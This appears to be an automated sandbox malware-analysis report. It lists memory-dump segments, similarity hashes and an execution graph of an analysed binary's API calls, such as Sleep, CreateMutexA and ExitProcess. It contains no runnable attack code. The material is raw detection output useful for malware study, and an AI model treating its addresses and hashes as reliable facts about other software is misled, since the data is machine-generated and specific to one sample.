                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                • String ID: v
                                                                                                                                                                                                • API String ID: 3213747228-1361604894
                                                                                                                                                                                                • Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                • Instruction ID: f5530a69dab17ef92fac6b6929f31fdd68290eace9acb73ed14f7109ece3cf9f
                                                                                                                                                                                                • Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: FAB11232A0064D9FDB15CF28C9817BEBBE5EF45344F3491AADA45FB281D6358D02CB60
                                                                                                                                                                                                Function 00EC2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Mtx_unlock
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1418687624-0
                                                                                                                                                                                                • Opcode ID: 68df3238d5e5f106a33b4c0dd9f963d49e2a52c4ebe8b90319be213602bf49f6
                                                                                                                                                                                                • Instruction ID: b533e5a1bfee4eef9659c9242b6ba3ad93401655092600a2141df9cdc29fedcd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 68df3238d5e5f106a33b4c0dd9f963d49e2a52c4ebe8b90319be213602bf49f6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94A1E171A016069FDB20DF74CA45B9AB7E8FF14358F14A12EE815E7341EB32DA06CB91

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                Total number of Nodes:602
                                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                                execution_graph 10214 7042b0 10217 703ac0 10214->10217 10216 7042bb shared_ptr 10218 703af9 10217->10218 10220 7032d0 5 API calls 10218->10220 10221 703c38 10218->10221 10223 703b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10218->10223 10219 7032d0 5 API calls 10224 703c5f 10219->10224 10220->10221 10221->10219 10221->10224 10222 703c68 10222->10216 10223->10216 10224->10222 10225 703810 3 API calls 10224->10225 10226 703cdb shared_ptr 10225->10226 10226->10216 10276 702170 10279 71c6fc 10276->10279 10278 70217a 10280 71c724 10279->10280 10281 71c70c 10279->10281 10280->10278 10281->10280 10283 71cfbe 10281->10283 10284 71ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10283->10284 10285 71cfd0 10284->10285 10285->10281 10286 703970 10287 71c68b __Mtx_init_in_situ 2 API calls 10286->10287 10288 7039a7 10287->10288 10289 71c68b __Mtx_init_in_situ 2 API calls 10288->10289 10290 7039e6 10289->10290 10397 7055f0 10398 705610 10397->10398 10399 7022c0 3 API calls 10398->10399 10400 705710 std::invalid_argument::invalid_argument 10398->10400 10399->10398 10401 7043f0 10402 71bedf InitOnceExecuteOnce 10401->10402 10403 70440a 10402->10403 10404 704411 10403->10404 10405 736cbb 3 API calls 10403->10405 10406 704424 10405->10406 10137 719ef0 10138 719f0c 10137->10138 10139 71c68b __Mtx_init_in_situ 2 API calls 10138->10139 10140 719f17 10139->10140 9692 704276 9695 702410 9692->9695 9694 70427f 9696 702424 9695->9696 9699 71b52d 9696->9699 9707 733aed 9699->9707 9701 71b5a5 ___std_exception_copy 9714 71b1ad 9701->9714 9702 71b598 9710 71af56 9702->9710 9706 70242a 9706->9694 9718 734f29 9707->9718 9711 71af9f ___std_exception_copy 9710->9711 9713 71afb2 shared_ptr 9711->9713 9756 71b39f 9711->9756 9713->9706 9715 71b1d8 9714->9715 9717 71b1e1 shared_ptr 9714->9717 9716 71b39f 4 API calls 9715->9716 9716->9717 9717->9706 9720 734f2e __cftof 9718->9720 9719 71b555 9719->9701 9719->9702 9719->9706 9720->9719 9724 738bfc __cftof 9720->9724 9725 73d634 9720->9725 9739 7365ed 9724->9739 9727 73d640 __cftof __dosmaperr 9725->9727 9726 73d69c __cftof __dosmaperr 9726->9724 9727->9726 9728 73d726 9727->9728 9729 73d81b __cftof 9727->9729 9730 73d751 __cftof 9727->9730 9728->9730 9742 73d62b 9728->9742 9731 7365ed __cftof 3 API calls 9729->9731 9730->9726 9737 73d7a5 9730->9737 9745 73a671 9730->9745 9732 73d82e 9731->9732 9736 73d62b __cftof 3 API calls 9736->9730 9737->9726 9738 73a671 __cftof 3 API calls 9737->9738 9738->9726 9740 7364c7 __cftof 3 API calls 9739->9740 9741 7365fe 9740->9741 9743 73a671 __cftof 3 API calls 9742->9743 9744 73d630 9743->9744 9744->9736 9746 73a67b __dosmaperr ___free_lconv_mon 9745->9746 9747 73a722 9746->9747 9750 738bec 9746->9750 9747->9737 9751 738bf1 __cftof 9750->9751 9752 73d634 __cftof 3 API calls 9751->9752 9755 738bfc __cftof 9751->9755 9752->9755 9753 7365ed __cftof 3 API calls 9754 738c2f 9753->9754 9755->9753 9767 71bedf 9756->9767 9759 71b3e8 9759->9713 9776 71cc31 9767->9776 9770 736cbb 9771 736cc7 __dosmaperr 9770->9771 9772 73a671 __cftof 3 API calls 9771->9772 9773 736ccc 9772->9773 9774 738bec __cftof 3 API calls 9773->9774 9775 736cf6 9774->9775 9777 71b3e1 9776->9777 9778 71cc3f InitOnceExecuteOnce 9776->9778 9777->9759 9777->9770 9778->9777 10227 709ab8 10229 709acc 10227->10229 10230 709b08 10229->10230 10231 70a917 10230->10231 10232 709b4b shared_ptr 10230->10232 10233 70a953 Sleep CreateMutexA 10231->10233 10234 705c10 3 API calls 10232->10234 10235 709b59 10232->10235 10236 70a98e 10233->10236 10237 709b7c 10234->10237 10238 708b30 3 API calls 10237->10238 10239 709b8d 10238->10239 10240 705c10 3 API calls 10239->10240 10241 709cb1 10240->10241 10242 708b30 3 API calls 10241->10242 10243 709cc2 10242->10243 9785 70cc79 9786 70cc84 shared_ptr 9785->9786 9787 70ccda shared_ptr std::invalid_argument::invalid_argument 9786->9787 9791 705c10 9786->9791 9789 70ce9d 9809 70ca70 9789->9809 9792 705c54 9791->9792 9819 704b30 9792->9819 9794 705d17 shared_ptr std::invalid_argument::invalid_argument 9794->9789 9795 705c7b __cftof 9795->9794 9796 705c10 3 API calls 9795->9796 9797 7066ac 9796->9797 9798 705c10 3 API calls 9797->9798 9799 7066b1 9798->9799 9823 7022c0 9799->9823 9801 7066c9 shared_ptr 9802 705c10 3 API calls 9801->9802 9803 70673d 9802->9803 9804 7022c0 3 API calls 9803->9804 9806 706757 shared_ptr 9804->9806 9805 705c10 3 API calls 9805->9806 9806->9805 9807 7022c0 3 API calls 9806->9807 9808 706852 shared_ptr std::invalid_argument::invalid_argument 9806->9808 9807->9806 9808->9789 9810 70cadd 9809->9810 9812 705c10 3 API calls 9810->9812 9817 70cc87 9810->9817 9811 70ccda shared_ptr std::invalid_argument::invalid_argument 9813 70ccf9 9812->9813 10028 709030 9813->10028 9815 705c10 3 API calls 9816 70ce9d 9815->9816 9818 70ca70 3 API calls 9816->9818 9817->9811 9817->9815 9821 704ce5 9819->9821 9822 704b92 9819->9822 9821->9795 9822->9821 9826 736da6 9822->9826 9912 702280 9823->9912 9827 736dc2 9826->9827 9828 736db4 9826->9828 9827->9822 9831 736d19 9828->9831 9836 73690a 9831->9836 9835 736d3d 9835->9822 9837 73692a 9836->9837 9838 736921 9836->9838 9837->9838 9839 73a671 __cftof 3 API calls 9837->9839 9844 736d52 9838->9844 9840 73694a 9839->9840 9850 73b5fb 9840->9850 9845 736d8f 9844->9845 9846 736d5f 9844->9846 9904 73b67d 9845->9904 9849 736d6e 9846->9849 9899 73b6a1 9846->9899 9849->9835 9851 736960 9850->9851 9852 73b60e 9850->9852 9854 73b628 9851->9854 9852->9851 9858 73f5ab 9852->9858 9855 73b650 9854->9855 9856 73b63b 9854->9856 9855->9838 9856->9855 9865 73e6b1 9856->9865 9859 73f5b7 __dosmaperr 9858->9859 9860 73a671 __cftof 3 API calls 9859->9860 9862 73f5c0 __cftof __dosmaperr 9860->9862 9861 73f606 9861->9851 9862->9861 9863 738bec __cftof 3 API calls 9862->9863 9864 73f62b 9863->9864 9866 73a671 __cftof 3 API calls 9865->9866 9867 73e6bb 9866->9867 9870 73e5c9 9867->9870 9869 73e6c1 9869->9855 9873 73e5d5 __cftof __dosmaperr ___free_lconv_mon 9870->9873 9871 73e5f6 9871->9869 9872 738bec __cftof 3 API calls 9874 73e668 9872->9874 9873->9871 9873->9872 9875 73e6a4 9874->9875 9879 73a72e 9874->9879 9875->9869 9883 73a739 __dosmaperr ___free_lconv_mon 9879->9883 9880 738bec __cftof 3 API calls 9881 73a7c7 9880->9881 9882 73a7be 9884 73e4b0 9882->9884 9883->9880 9883->9882 9885 73e5c9 __cftof 3 API calls 9884->9885 9886 73e4c3 9885->9886 9891 73e259 9886->9891 9888 73e4cb __cftof 9890 73e4dc __cftof __dosmaperr ___free_lconv_mon 9888->9890 9894 73e6c4 9888->9894 9890->9875 9892 73690a __cftof GetPEB ExitProcess GetPEB 9891->9892 9893 73e26b 9892->9893 9893->9888 9895 73e259 __cftof GetPEB ExitProcess GetPEB 9894->9895 9898 73e6e4 __cftof 9895->9898 9896 73e75a __cftof std::invalid_argument::invalid_argument 9896->9890 9897 73e32f __cftof GetPEB ExitProcess GetPEB 9897->9896 9898->9896 9898->9897 9900 73690a __cftof 3 API calls 9899->9900 9901 73b6be 9900->9901 9903 73b6ce std::invalid_argument::invalid_argument 9901->9903 9909 73f1bf 9901->9909 9903->9849 9905 73a671 __cftof 3 API calls 9904->9905 9906 73b688 9905->9906 9907 73b5fb __cftof 3 API calls 9906->9907 9908 73b698 9907->9908 9908->9849 9910 73690a __cftof 3 API calls 9909->9910 9911 73f1df __cftof __freea std::invalid_argument::invalid_argument 9910->9911 9911->9903 9913 702296 9912->9913 9916 7387f8 9913->9916 9919 737609 9916->9919 9918 7022a4 9918->9801 9920 737631 __cftof __dosmaperr std::invalid_argument::invalid_argument 9919->9920 9921 737649 9919->9921 9920->9918 9921->9920 9922 73690a __cftof 3 API calls 9921->9922 9923 737661 9922->9923 9925 737bc4 9923->9925 9927 737bd5 9925->9927 9926 737be4 __cftof __dosmaperr 9926->9920 9927->9926 9932 738168 9927->9932 9937 737dc2 9927->9937 9942 737de8 9927->9942 9952 737f36 9927->9952 9933 738171 9932->9933 9934 738178 9932->9934 9961 737b50 9933->9961 9934->9927 9936 738177 9936->9927 9938 737dd2 9937->9938 9939 737dcb 9937->9939 9938->9927 9940 737b50 3 API calls 9939->9940 9941 737dd1 9940->9941 9941->9927 9943 737e09 __cftof __dosmaperr 9942->9943 9946 737def 9942->9946 9943->9927 9944 737f69 9949 737f77 9944->9949 9951 737f8b 9944->9951 9979 738241 9944->9979 9945 737fa2 9945->9951 9975 738390 9945->9975 9946->9943 9946->9944 9946->9945 9946->9949 9949->9951 9983 7386ea 9949->9983 9951->9927 9953 737f69 9952->9953 9956 737f4f 9952->9956 9955 737f8b 9953->9955 9957 738241 3 API calls 9953->9957 9959 737f77 9953->9959 9954 737fa2 9954->9955 9958 738390 3 API calls 9954->9958 9955->9927 9956->9953 9956->9954 9956->9959 9957->9959 9958->9959 9959->9955 9960 7386ea 3 API calls 9959->9960 9960->9955 9962 737b62 __dosmaperr 9961->9962 9965 738ab6 9962->9965 9964 737b85 __dosmaperr 9964->9936 9966 738ad1 9965->9966 9969 738868 9966->9969 9968 738adb 9968->9964 9970 73887a 9969->9970 9971 73690a __cftof GetPEB ExitProcess GetPEB 9970->9971 9974 73888f __cftof __dosmaperr 9970->9974 9973 7388bf 9971->9973 9972 736d52 GetPEB ExitProcess GetPEB 9972->9973 9973->9972 9973->9974 9974->9968 9976 7383ab 9975->9976 9977 7383dd 9976->9977 9987 73c88e 9976->9987 9977->9949 9980 73825a 9979->9980 9994 73d3c8 9980->9994 9982 73830d 9982->9949 9982->9982 9984 73875d std::invalid_argument::invalid_argument 9983->9984 9986 738707 9983->9986 9984->9951 9985 73c88e __cftof 3 API calls 9985->9986 9986->9984 9986->9985 9990 73c733 9987->9990 9989 73c8a6 9989->9977 9991 73c743 9990->9991 9992 73690a __cftof GetPEB ExitProcess GetPEB 9991->9992 9993 73c748 __cftof __dosmaperr 9991->9993 9992->9993 9993->9989 9995 73d3d8 __cftof __dosmaperr 9994->9995 9996 73d3ee 9994->9996 9995->9982 9996->9995 9997 73d485 9996->9997 9998 73d48a 9996->9998 10000 73d4e4 9997->10000 10001 73d4ae 9997->10001 10007 73cbdf 9998->10007 10024 73cef8 10000->10024 10002 73d4b3 10001->10002 10003 73d4cc 10001->10003 10013 73d23e 10002->10013 10020 73d0e2 10003->10020 10008 73cbf1 10007->10008 10009 73690a __cftof GetPEB ExitProcess GetPEB 10008->10009 10010 73cc05 10009->10010 10011 73cef8 GetPEB ExitProcess GetPEB 10010->10011 10012 73cc0d __alldvrm __cftof __dosmaperr _strrchr 10010->10012 10011->10012 10012->9995 10015 73d26c 10013->10015 10014 73d2a5 10014->9995 10015->10014 10016 73d2de 10015->10016 10018 73d2b7 10015->10018 10017 73cf9a GetPEB ExitProcess GetPEB 10016->10017 10017->10014 10019 73d16d GetPEB ExitProcess GetPEB 10018->10019 10019->10014 10021 73d10f 10020->10021 10022 73d14e 10021->10022 10023 73d16d GetPEB ExitProcess GetPEB 10021->10023 10022->9995 10023->10022 10025 73cf10 10024->10025 10026 73cf75 10025->10026 10027 73cf9a GetPEB ExitProcess GetPEB 10025->10027 10026->9995 10027->10026 10029 709080 10028->10029 10030 705c10 3 API calls 10029->10030 10031 70909a shared_ptr std::invalid_argument::invalid_argument 10030->10031 10031->9817 10442 738bbe 10443 738868 3 API calls 10442->10443 10444 738bdc 10443->10444 10244 7020a0 10245 71c68b __Mtx_init_in_situ 2 API calls 10244->10245 10246 7020ac 10245->10246 10344 704120 10345 70416a 10344->10345 10347 7041b2 std::invalid_argument::invalid_argument 10345->10347 10348 703ee0 10345->10348 10349 703f48 10348->10349 10350 703f1e 10348->10350 10351 703f58 10349->10351 10354 702c00 10349->10354 10350->10347 10351->10347 10355 702c0e 10354->10355 10361 71b847 10355->10361 10357 702c42 10358 702c49 10357->10358 10367 702c80 10357->10367 10358->10347 10360 702c58 Concurrency::cancel_current_task 10362 71b854 10361->10362 10366 71b873 Concurrency::details::_Reschedule_chore 10361->10366 10370 71cb77 10362->10370 10364 71b864 10364->10366 10372 71b81e 10364->10372 10366->10357 10378 71b7fb 10367->10378 10369 702cb2 shared_ptr 10369->10360 10371 71cb92 CreateThreadpoolWork 10370->10371 10371->10364 10373 71b827 Concurrency::details::_Reschedule_chore 10372->10373 10376 71cdcc 10373->10376 10375 71b841 10375->10366 10377 71cde1 TpPostWork 10376->10377 10377->10375 10379 71b807 10378->10379 10380 71b817 10378->10380 10379->10380 10382 71ca78 10379->10382 10380->10369 10383 71ca8d TpReleaseWork 10382->10383 10383->10380 10407 703fe0 10408 704022 10407->10408 10409 7040d2 10408->10409 10410 70408c 10408->10410 10413 704035 std::invalid_argument::invalid_argument 10408->10413 10411 703ee0 3 API calls 10409->10411 10414 7035e0 10410->10414 10411->10413 10415 703616 10414->10415 10419 70364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10415->10419 10420 702ce0 10415->10420 10417 70369e 10418 702c00 3 API calls 10417->10418 10417->10419 10418->10419 10419->10413 10421 702d1d 10420->10421 10422 71bedf InitOnceExecuteOnce 10421->10422 10423 702d46 10422->10423 10424 702d88 10423->10424 10425 702d51 std::invalid_argument::invalid_argument 10423->10425 10429 71bef7 10423->10429 10427 702440 3 API calls 10424->10427 10425->10417 10428 702d9b 10427->10428 10428->10417 10430 71bf03 Concurrency::cancel_current_task 10429->10430 10431 71bf73 10430->10431 10432 71bf6a 10430->10432 10433 702ae0 4 API calls 10431->10433 10436 71be7f 10432->10436 10435 71bf6f 10433->10435 10435->10424 10437 71cc31 InitOnceExecuteOnce 10436->10437 10438 71be97 10437->10438 10439 71be9e 10438->10439 10440 736cbb 3 API calls 10438->10440 10439->10435 10441 71bea7 10440->10441 10441->10435 10445 709ba5 10446 709ba7 10445->10446 10447 705c10 3 API calls 10446->10447 10448 709cb1 10447->10448 10449 708b30 3 API calls 10448->10449 10450 709cc2 10449->10450 9676 736629 9679 7364c7 9676->9679 9680 7364d5 __cftof 9679->9680 9681 736520 9680->9681 9684 73652b 9680->9684 9683 73652a 9690 73a302 GetPEB 9684->9690 9686 736535 9687 73654a __cftof 9686->9687 9688 73653a GetPEB 9686->9688 9689 736562 ExitProcess 9687->9689 9688->9687 9691 73a31c __cftof 9690->9691 9691->9686 10247 705cad 10248 705caf __cftof 10247->10248 10249 705d17 shared_ptr std::invalid_argument::invalid_argument 10248->10249 10250 705c10 3 API calls 10248->10250 10251 7066ac 10250->10251 10252 705c10 3 API calls 10251->10252 10253 7066b1 10252->10253 10254 7022c0 3 API calls 10253->10254 10255 7066c9 shared_ptr 10254->10255 10256 705c10 3 API calls 10255->10256 10257 70673d 10256->10257 10258 7022c0 3 API calls 10257->10258 10260 706757 shared_ptr 10258->10260 10259 705c10 3 API calls 10259->10260 10260->10259 10261 7022c0 3 API calls 10260->10261 10262 706852 shared_ptr std::invalid_argument::invalid_argument 10260->10262 10261->10260 10384 71d111 10385 71d121 10384->10385 10387 71d12a 10385->10387 10388 71d199 10385->10388 10389 71d1a7 SleepConditionVariableCS 10388->10389 10391 71d1c0 10388->10391 10389->10391 10391->10385 10392 702b10 10393 702b1a 10392->10393 10394 702b1c 10392->10394 10395 71c26a 4 API calls 10394->10395 10396 702b22 10395->10396 10456 702b90 10457 702bce 10456->10457 10458 71b7fb TpReleaseWork 10457->10458 10459 702bdb shared_ptr std::invalid_argument::invalid_argument 10458->10459 9671 70a856 9673 70a870 9671->9673 9675 70a892 